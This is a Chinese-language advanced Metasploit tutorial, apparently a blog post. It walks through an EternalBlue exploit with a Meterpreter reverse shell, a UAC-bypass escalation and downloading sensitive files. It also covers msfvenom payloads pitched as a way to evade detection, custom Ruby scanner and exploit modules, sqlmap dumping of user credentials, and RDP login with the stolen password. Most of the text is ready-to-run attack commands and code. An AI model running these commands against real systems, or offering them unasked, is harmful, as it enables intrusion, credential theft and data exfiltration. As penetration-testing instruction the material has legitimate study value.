Metasploit Framework进阶2

一、高级使用方法

1. 高级漏洞利用技术

a. 多阶段攻击

多阶段攻击是一种复杂的攻击方法，通过多个步骤逐步获取目标的控制权。

示例：利用MS17-010漏洞攻击Windows系统并提升权限

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set LHOST 192.168.1.1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run

# 在获取Meterpreter shell后，进一步利用UAC绕过进行权限提升
use exploit/windows/local/bypassuac
set SESSION 1
set LHOST 192.168.1.1
run

b. 后渗透攻击

在获得目标系统的访问权限后，进行进一步的攻击，如数据窃取、网络横向移动等。

示例：在获得Meterpreter shell后，进行网络扫描和数据窃取

# 获取目标系统的网络信息
meterpreter> run post/windows/gather/enum_network

# 获取目标系统上的敏感文件
meterpreter> search -f *.docx
meterpreter> download /path/to/sensitive/file.docx /local/path

2. 自定义Payload生成

使用msfvenom生成自定义Payload，以避开防御系统的检测。

示例：生成一个自定义的Meterpreter反向TCP Payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f exe -o custom_payload.exe

二、实战效果展示

1. 编写自定义模块

编写一个自定义的扫描模块，扫描目标网络中的所有开放端口。

创建一个Ruby脚本文件，如advanced_scan.rb：

require 'msf/core'

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Advanced TCP Port Scanner',
      'Description' => 'This module scans for open TCP ports on a range of IP addresses.',
      'Author'      => [ 'Your Name' ],
      'License'     => MSF_LICENSE
    ))

    register_options(
      [
        OptString.new('RHOSTS', [true, 'The target address range or CIDR identifier']),
        OptString.new('PORTS', [true, 'Comma-separated list of ports to scan'])
      ]
    )
  end

  def run
    rhosts.split(',').each do |rhost|
      ports = datastore['PORTS'].split(',')
      ports.each do |port|
        begin
          connect(true, {'RHOST' => rhost, 'RPORT' => port.to_i})
          print_good("Port #{port} is open on #{rhost}")
        rescue ::Rex::ConnectionError
          print_error("Port #{port} is closed on #{rhost}")
        ensure
          disconnect
        end
      end
    end
  end
end

将该脚本放入Metasploit的模块路径中，如~/.msf4/modules/auxiliary/scanner/advanced_scan.rb。

2. 使用自定义模块

在Metasploit控制台中加载并使用自定义扫描模块：

msfconsole
use auxiliary/scanner/advanced_scan
set RHOSTS 192.168.1.0/24
set PORTS 80,443,445,3389
run

3. 编写自定义漏洞利用模块

编写一个自定义的漏洞利用模块，以利用目标系统上的一个特定漏洞。

创建一个Ruby脚本文件，如custom_exploit.rb：

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Custom Exploit Example',
      'Description'    => %q{
        This module exploits a custom vulnerability.
      },
      'Author'         => [ 'Your Name' ],
      'License'        => MSF_LICENSE,
      'References'     => [ [ 'URL', 'http://example.com' ] ],
      'Payload'        => { 'BadChars' => "\x00" },
      'Platform'       => 'win',
      'Targets'        => [ [ 'Windows', { } ] ],
      'DisclosureDate' => 'Jan 01 2024',
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        Opt::RPORT(4444)
      ], self.class)
  end

  def exploit
    connect

    print_status("Sending payload...")
    sock.put(payload.encoded)

    handler
    disconnect
  end
end

将该脚本放入Metasploit的模块路径中，如~/.msf4/modules/exploits/windows/custom_exploit.rb。

三、实战案例分析

1. 实战案例：利用SQL注入和Metasploit进行攻击

a. 发现SQL注入漏洞

通过手动测试或自动化工具发现目标Web应用存在SQL注入漏洞。

b. 使用SQLMap进行漏洞利用

使用SQLMap进行SQL注入攻击，获取数据库信息。

sqlmap -u "http://example.com/vulnerable_page.php?id=1" --dbs

c. 获取管理员凭据

使用SQLMap进一步获取管理员凭据。

sqlmap -u "http://example.com/vulnerable_page.php?id=1" -D database_name -T users -C username,password --dump

d. 使用Metasploit进行进一步攻击

利用获取的管理员凭据，使用Metasploit进行进一步攻击。

use auxiliary/scanner/rdp/rdp_login
set RHOSTS 192.168.1.100
set USERNAME admin
set PASSWORD password123
run

成功登录后，可以进行进一步的漏洞利用和后渗透攻击。